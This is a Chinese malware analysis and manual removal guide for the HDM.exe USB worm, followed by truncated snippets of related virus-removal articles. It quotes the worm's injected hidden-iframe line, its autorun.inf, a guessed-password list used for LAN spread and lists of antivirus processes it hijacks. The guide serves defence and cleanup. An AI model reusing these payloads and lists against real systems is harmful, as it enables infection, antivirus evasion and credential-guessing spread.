HDM.exe手工查杀U盘病毒的方法

HDM.exe是一个恶性的U盘病毒,其破坏力巨大,主要表现在以下几个方面:

Quote:
1.使用恢复SSDT的方式破坏杀毒软件
2.IFEO映像劫持
3.关闭指定窗口
4.删除gho文件
5.破坏安全模式,以及显示隐藏文件功能
6.感染htm等网页文件
7.猜测密码通过局域网传播
8.通过U盘等移动存储传播
9.arp欺骗

具体分析如下:

Quote:
File: HDM.exe
Size: 13312 bytes
Modified: 2007年11月28日, 16:52:08
MD5: 7EC36FA2BCFC1EA72C26B74C928C78F6
SHA1: B60048A8F9DB67EDF4B94BFE4DA2A1906CD33B59
CRC32: 88D8970A

技术细节:

1.病毒运行后,释放如下文件以及副本:

Quote:
C:\WINDOWS\system32\Winlogon.dll
C:\RESSDT.sys

遍历所有磁盘分区 在磁盘根目录下写入HDM.exe和autorun.inf 以达到通过U盘等移动存储传播的目的

同时建立服务RESSDT
服务相关描述:
启动类型:手动
映像文件路径:c:\RESSDT.sys"
显示名称:"RESSDT"

之后加载该驱动 该驱动能够使得某些杀毒软件的API hook失效

2.释放一个GetIp.bat到病毒所在目录下,从而获得IP地址

3.利用ping命令探测同一网段内的其他机器,并把结果写入c:\EnumHost.txt

4.如果查找到同一网段内的其他机器,则通过枚举用户名和密码的方式将HDM.exe复制到其他机器的C,D,E,F盘的根目录下
枚举的用户名和密码如下:

Quote:
home
movie
alex
love
xp
123
administrator
new
guest
user
game
time
yeah
money
xpuser

123456
qwerty
abc123
memory
12345678
88888
5201314
1314520
asdfgh
angel
asdf 
baby
woaini

之后会利用获得当前机器的时间 并利用at命令定时启动该病毒

5.获得系统目录,下载http://*/arp.exe和http://*/winpcap.exe
到系统目录下面
winpcap.exe是嗅探器 
arp.exe具有arp欺骗功能,可以向局域网中的其它机器的80端口加入http://www.*/wm.htm的iframe代码

6.遍历磁盘所有分区下面的html,htm,asp,aspx,php,jsp文件
在其尾部加入<iframe src=http://www.*/wm.htm width=0 height=0></iframe>的代码

7.遍历所有磁盘分区删除gho文件

8.在software\microsoft\windows nt\currentversion\image file execution options\下面添加IFEO项目,劫持某些杀毒软件

Quote:
360rpt.exe
360Safe.exe
360tray.exe
adam.exe
AgentSvr.exe
AppSvc32.exe
autoruns.exe
avgrssvc.exe
AvMonitor.exe
avp.com
avp.exe
CCenter.exe
ccSvcHst.exe
FileDsty.exe
FrameworkServices.exe
FTCleanerShell.exe
HijackThis.exe
IceSword.exe
iparmo.exe
Iparmor.exe
isPwdSvc.exe
kabaload.exe
KaScrScn.SCR
KASMain.exe
KASTask.exe
KAV32.exe
KAVDX.exe
KAVPFW.exe
KAVSetup.exe
KAVStart.exe
KISLnchr.exe
KMailMon.exe
KMFilter.exe
kmp.exe
KPFW32.exe
KPFW32X.exe
KPFWSvc.exe
KRegEx.exe
KRepair.COM
KsLoader.exe
KVCenter.kxp
KvDetect.exe
KvfwMcl.exe
KVMonXP.kxp
KVMonXP_1.kxp
kvol.exe
kvolself.exe
KvReport.kxp
KVScan.kxp
KVSrvXP.exe
KVStub.kxp
kvupload.exe
kvwsc.exe
KvXP.kxp
KvXP_1.kxp
KWatch.exe
KWatch9x.exe
KWatchX.exe
loaddll.exe
MagicSet.exe
mcconsol.exe
Mcshield.exe
mmqczj.exe
mmsk.exe
MPMon.exe
MPSVC.exe
MPSVC1.exe
MPSVC2.exe
naPrdMgr.exe
NAVSetup.exe
nod32krn.exe
nod32kui.exe
PFW.exe
PFWLiveUpdate.exe
QHSET.exe
Ras.exe
Rav.exe
RavMon.exe
RavMonD.exe
RavStub.exe
RavTask.exe
RegClean.exe
regedit.exe
rfwcfg.exe
RfwMain.exe
rfwProxy.exe
rfwsrv.exe
RsAgent.exe
Rsaupd.exe
runiep.exe
safelive.exe
scan32.exe
shcfg32.exe
shstat.exe
SmartUp.exe
SREng.exe
SWEEP95.exe
symlcsvc.exe
SysSafe.exe
Tbmon.exe
TBSCAN.exe
TERegPct.exe
TrojanDetector.exe
Trojanwall.exe
TrojDie.kxp
UIHost.exe
UmxAgent.exe
UmxAttachment.exe
UmxCfg.exe
UmxFwHlp.exe
UmxPol.exe
UpdateUI.exe
UpLive.EXE.exe
VsTskMgr.exe
WEBSCANX.exe
WoptiClean.exe
ZONEALARM.exe
zxsweep.exe
_AVP32.EXE
_AVPCC.EXE
_AVPM.EXE

9.将HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue的值改为0x00000001 破坏显示隐藏文件

10.删除system\currentcontrolset\control\safeboot\network
和system\currentcontrolset\control\safeboot\minimal键
破坏安全模式

11.查找指定窗口的名称,并将其关闭

Quote:
安全卫士
扫描
专杀
注册表
process
进程

木马
防御
防火墙
病毒
检测
firewall
virus
anti
金山
江民
卡巴斯基
worm
杀毒

12.启动c:\program files\internet explorer\iexplore.exe下载木马
下载http://www.*/1.exe~http://www.*/6.exe
到temp文件夹下面分别命名为downfile.exe~downfile5.exe
其中的1.exe又是一个木马下载器,它可以下载很多木马,但测试中并未植入成功...

13.同时在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run下面添加注册表项目
<calc.exe><%SystemRoot%\system32\calc.exe>使得calc.exe开机启动 但不知具体有什么作用...

14.在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Winlogon下面添加注册表项目
<WinlogonNotify: Winlogon><C:\WINDOWS\system32\Winlogon.dll> []

15.病毒体内有文字:“nofixups!”“just test !”

全部木马和病毒植入完毕后的sreng日志如下:
启动项目

Quote:
注册表
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    <calc.exe><%SystemRoot%\system32\calc.exe> [(Verified)Microsoft Windows Publisher]
    <Cifmon><C:\WINDOWS\system32\Server.EXE> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Winlogon]
    <WinlogonNotify: Winlogon><C:\WINDOWS\system32\Winlogon.dll> []

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe]
    <IFEO[360rpt.exe]><C:\HDM.exe> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe]
    <IFEO[360Safe.exe]><C:\HDM.exe> []...

==================================
驱动程序
[RAS Asynchronous Media Driver / AsyncMac][Stopped/Auto Start]
<system32\DRIVERS\comint32.sys><N/A>
[MS / MS][Stopped/Manual Start]
<\??\C:\DOCUME~1\NEWCEN~1\LOCALS~1\Temp\tmp13.tmp><N/A>
[RESSDT / RESSDT][Stopped/Manual Start]
<\??\c:\RESSDT.sys><N/A>
[usbmouseb / usbmouseb][Running/Manual Start]
<\??\C:\WINDOWS\SYSTEM32\drivers\smbins.sys><N/A>
==================================
正在运行的进程
[PID: 1148][C:\Program Files\Internet Explorer\iexplore.exe] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-

2158)]
    [C:\WINDOWS\system32\Insert.dll] [N/A, ]
[PID: 1428][C:\WINDOWS\explorer.exe] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
    [C:\WINDOWS\SYSTEM32\smbins.dll] [Microsoft Corporation, 5, 0, 2195, 3649]
==================================
Autorun.inf
[C:\]
[AutoRun]
OPEN=HDM.exe
shellopen=打开(&O)
shellopenCommand=HDM.exe
shellopenDefault=1
shellexplore=资源管理器(&X)
shell\explore\command=HDM.exe
[D:\]
[AutoRun]
OPEN=HDM.exe
shellopen=打开(&O)
shellopenCommand=HDM.exe
shellopenDefault=1
shellexplore=资源管理器(&X)
shell\explore\command=HDM.exe

某些木马没有植入成功,所以无法体现

解决方法:

下载sreng和Xdelbox

1.解压Xdelbox所有文件到一个文件夹
在 添加旁边的框中 分别输入
%systemroot%\system32\DRIVERS\comint32.sys
%systemroot%\system32\Server.EXE
%systemroot%\system32\Winlogon.dll
c:\RESSDT.sys
%systemroot%\system32\drivers\smbins.sys
%systemroot%\system32\Insert.dll
%systemroot%\SYSTEM32\smbins.dll
输入完一个以后 点击旁边的添加 按钮 被添加的文件 将出现在下面的大框中
然后一次性选中 (按住ctrl)下面大框中所有的文件
右键 单击 点击 重启立即删除

卸载winpcap.exe软件

2.重启计算机后
打开sreng
启动项目 注册表 删除如下项目 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    <calc.exe><%SystemRoot%\system32\calc.exe> [(Verified)Microsoft Windows Publisher]
    <Cifmon><C:\WINDOWS\system32\Server.EXE> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Winlogon]
    <WinlogonNotify: Winlogon><C:\WINDOWS\system32\Winlogon.dll> []
删除所有红色的IFEO项目

在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:

Quote:
[RAS Asynchronous Media Driver / AsyncMac][Stopped/Auto Start]
<system32\DRIVERS\comint32.sys><N/A>
[MS / MS][Stopped/Manual Start]
<\??\C:\DOCUME~1\NEWCEN~1\LOCALS~1\Temp\tmp13.tmp><N/A>
[RESSDT / RESSDT][Stopped/Manual Start]
<\??\c:\RESSDT.sys><N/A>
[usbmouseb / usbmouseb][Running/Manual Start]
<\??\C:\WINDOWS\SYSTEM32\drivers\smbins.sys><N/A>

系统修复-Windows Shell/IE 全选 点击修复
系统修复-高级修复-修复安全模式

双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
点击 菜单栏下方的 文件夹按钮(搜索右边的按钮)
在左边的资源管理器中单击打开所有磁盘分区
分别删除其根目录下的HDM.exe和autorun.inf

3.修复被感染的网页文件

推荐使用iframkill

截至到目前,还没有一个杀毒软件报出这个病毒

由于这是一个比较恶性的病毒,一旦流行开来后果将不堪设想,因此希望大家做好以下工作防范类似病毒出现
1.打全系统补丁,及时升级杀毒软件和防火墙并打开实时监控功能
2.给系统设定一个复杂的密码
3.关闭自动播放,阻止类似通过U盘传播的病毒的侵入

时间: 2007-12-04

水牛(shuiniu.exe)手工查杀方法不用专杀工具

这是一个可以通过移动存储传播的恶性病毒,具有反病毒软件和下载木马的功能,且病毒采用了向svchost.exe注入病毒代码的方法保护自身,使其发现和删除更加困难,因其主文件名"ShuiNiu.exe",因此称病毒为"水牛"病毒. Quote: File: ShuiNiu.exe Size: 22069 bytes Modified: 2007年11月5日, 10:13:38 MD5: 1FA97A5E1766D6E668321838A6F3E536 SHA1: 943

最新病毒结合auto.exe,游戏盗号木马下载者手工查杀microsofts.vbs

最新病毒结合auto.exe,游戏盗号木马下载者手工查杀下面是启用病毒的代码microsofts.vbs 复制代码 代码如下: Set Lovecuteqq = CreateObject("Wscript.Shell") Lovecuteqq.run ("C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\microsofts.pif") 木马名称:Trojan-PSW/Win32.OnLineGames.lxt 路径:C:\WINDOWS\sys

shualai.exe病毒及手工查杀方法

这是个利用ANI漏洞传播的木马群,其"动态插入进程"的功能是导致中招后杀毒困难的原因之一. 另:中招后,系统分区以外的.exe全被感染.这也是中此毒后的麻烦之处. 中招后的"症状":进程列表中可见shualai.exe进程. 建议:用SRENG扫份日志保存,以便弄清基本情况,便于后面的手工杀毒操作. 手工查杀流程如下(用IceSword操作): 1.禁止进程创建. 2.根据SRENG日志,先结束病毒进程shualai.exe以及所有被病毒模块插入的进程(病毒插入了哪

对于最近出现的Death.exe病毒及其变种的手工查杀办法不用专杀工具

病毒症状: 杀毒软件被禁用.隐藏文件无法显示.开始命令msconfig无法运行.很多辅助软件也无法运行,运行EXE以及SCR 文件后被病毒的感染 手动查杀用到的软件: SRENG软件以及XDELBOX软件 Quote: 病毒名称:Trojan-Downloader.Win32.Agent.**** 病毒类型:木马 病毒MD5:2ccd81d7d358778b11de9303e0097d2d 加壳类型:UPX 编写语言:Borland Delphi 6.0 - 7.0 病毒运行 生成进程: Cod

自制杀u盘病毒的批处理代码

复制代码 代码如下: @echo off&mode con cols=61 lines=25&color f2title U盘病毒天敌echo 名称:u盘病毒的天敌echo 平台:windows xpecho 作者:小强echo 版权所有,请勿倒翻!cd\ del /f /q /ah *.exe 2>nuldel /f /q /as *.exe 2>nuldel /f /q ...exe 2>nuldel /f /q *.inf 2>nulmd autorun.in

手工查杀SMSS.exe hook.dll fOxkb.sys的方法

病毒名称:Trojan-PSW.Win32.OnLineGames.qw [dll](Kaspersky), Rootkit.Win32.Agent.fy [sys](Kaspersky) 病毒别名:Trojan.PSW.Win32.JHOnline.a [exe](瑞星), Trojan.PSW.Win32.OnlineGames.dba [dll](瑞星)  Trojan.PSW.Win32.JHOnline.a [sys](瑞星) 病毒大小:49,664 字节 加壳方式: 样本MD5:33

RAV0088.exe RAV0088.DAT手工查杀方法

病毒名称:N/A(Kaspersky) 病毒别名:Win32.Troj.OnLineGamesT.cu.65536 [dll](毒霸) 病毒大小:9,420 字节 加壳方式:PE_Patch UPack 样本MD5:e14c15ece526b8dea5347b1bdad8afe0 样本SHA1:31bd81eaf9182e9f87a9c2df55fa748a8c1ce0ad 发现时间:2007.8 更新时间:2007.8 关联病毒: 传播方式:通过恶意网站传播,其它木马下载 技术分析 =====

winasse.exe的手工查杀流程[图文]教程

1.结束进程winasse.exe(路径:C:\WINDOWS\system32\winasse.exe)2.删除病毒添加的启动项(图1)3.删除下列文件及文件夹(图2)图1 图2

wuaucll.exe(driver.exe)的查杀办法

电脑一开机就假死着,估计是中毒了,打开任务管理器,发现若干不明进程,一一结束了,不过有两个甚为顽固wuaucll.exe和driver.exe,结束了以后又自动运行.google了下,发现它的特点: 1.植入系统并成功运行后,更改.exe文件关联.中招后,用户运行任何.exe程序,都将激活木马wuaucll.exe.用SREng在WINDOWS模式下不能修复.exe文件关联! 2.wuaucll.exe和driver.exe双进程,互相守护. 3.植入系统后wuaucll.exe反复不停的写木马